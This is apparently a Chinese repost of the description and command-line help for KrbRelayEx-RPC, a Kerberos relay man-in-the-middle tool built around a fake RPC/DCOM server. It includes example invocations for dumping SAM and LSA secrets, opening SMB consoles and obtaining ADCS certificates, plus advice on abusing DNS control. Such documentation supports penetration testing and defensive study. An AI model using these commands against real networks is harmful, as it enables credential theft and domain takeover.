KrbRelayEx-RPC 是旨在通过中继 Kerberos AP-REQ 票证来执行中间人 (MitM) 攻击。
此版本实现了一个伪造的 RPC/DCOM 服务器:
- 监听经过身份验证的ISystemActivator请求并提取 AP-REQ 票证
- 从EPMAPPER/OXID解析中提取动态端口绑定
- 中继 AP-REQ 以代表受害者访问 SMB 共享或 HTTP ADCS(Active Directory 证书服务)
- 将受害者的请求动态且透明地转发到真正的目标 RPC/DCOM 应用程序,因此受害者不知道他们的请求被拦截和中继
目标
此工具的目的是测试是否可以通过利用 DNS 欺骗、流量转发和 Kerberos 中继来执行中间人 (MitM) 攻击。这尤其重要,因为Kerberos 身份验证通常用于通过主机名或完全限定域名 (FQDN) 访问资源,使其成为许多企业网络的基石。
特征
- 中继 Kerberos AP-REQ 票证以访问 SMB 共享或 HTTP ADCS 端点。
- 交互式或后台多线程 SMB 控制台,用于管理多个连接、实现文件操作以及服务的创建/启动。
- 多线程端口转发,将来自客户端的额外流量转发到原始目的地,例如 RDP、HTTP(S)、RPC Mapper、WinRM……
- 透明的中继过程,实现无缝的用户访问。
- 通过 .NET 8.0 SDK 实现与 Windows 和 GNU/Linux 的跨平台兼容性。
Usage:
KrbRelayEx.exe -spn <SPN> [OPTIONS] [ATTACK]
Description:
KrbRelayEx-RPC is a tool designed for performing Man-in-the-Middle (MitM) attacks and relaying Kerberos AP-REQ tickets.
It listens for incoming authenticated ISystemActivator requests, extracts dynamic port bindings from EPMAPPER/OXID resolutions,
captures the AP-REQ for accessing SMB shares or HTTP ADCS (Active Directory Certificate Services endpoints), then dynamically
and transparently forwards the victim's requests to the real destination host and port
The tool can span several SMB consoles, and the relaying process is completely transparent to the end user, who will seamlessly access the desired RPC/DCOM appliaction
Usage:
KrbRelayEx.exe -spn <SPN> [OPTIONS] [ATTACK]
SMB Attacks:
-console Start an interactive SMB console
-bgconsole Start an interactive SMB console in background via sockets
-list List available SMB shares on the target system
-bgconsolestartport Specify the starting port for background SMB console sockets (default: 10000)
-secrets Dump SAM & LSA secrets from the target system
HTTP Attacks:
-endpoint <ENDPOINT> Specify the HTTP endpoint to target (e.g., 'CertSrv')
-adcs <TEMPLATE> Generate a certificate using the specified template
Options:
-redirectserver <IP> Specify the IP address of the target server for the attack
-ssl Use SSL transport for secure communication
-redirectports <PORTS> Provide a comma-separated list of additional ports to forward to the target (e.g., '3389,445,5985')
-rpcport <PORT> Specify the RPC port to listen on (default: 135)
Examples:
Start an interactive SMB console:
KrbRelay.exe -spn CIFS/target.domain.com -console -redirecthost <ip_target_host>
List SMB shares on a target:
KrbRelay.exe -spn CIFS/target.domain.com -list
Dump SAM & LSA secrets:
KrbRelay.exe -spn CIFS/target.domain.com -secrets -redirecthost <ip_target_host>
Start a background SMB console on port 10000 upon relay:
KrbRelay.exe -spn CIFS/target.domain.com -bgconsole -redirecthost <ip_target_host>
Generate a certificate using ADCS with a specific template:
KrbRelay.exe -spn HTTP/target.domain.com -endpoint CertSrv -adcs UserTemplate-redirecthost <ip_target_host>
Relay attacks with SSL and port forwarding:
KrbRelay.exe -spn HTTP/target.domain.com -ssl -redirectserver <ip_target_host> -redirectports 3389,5985,135,553,80
Notes:
- KrbRelayEx intercepts and relays the first authentication attempt,
then switches to forwarder mode for all subsequent incoming requests.
You can press any time 'r' for restarting relay mode
- This tool is particularly effective if you can manipulate DNS names. Examples include:
- Being a member of the DNS Admins group.
- Having zones where unsecured DNS updates are allowed in Active Directory domains.
- Gaining control over HOSTS file entries on client computers.
- Background consoles are ideal for managing multiple SMB consoles
** IMPORTANT: Ensure that you configure the entries in your hosts file to point to the actual target IP addresses!
原文始发于微信公众号(TtTeam):RPC/DCOM MiTM 服务器的 Kerberos 中继和转发器
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论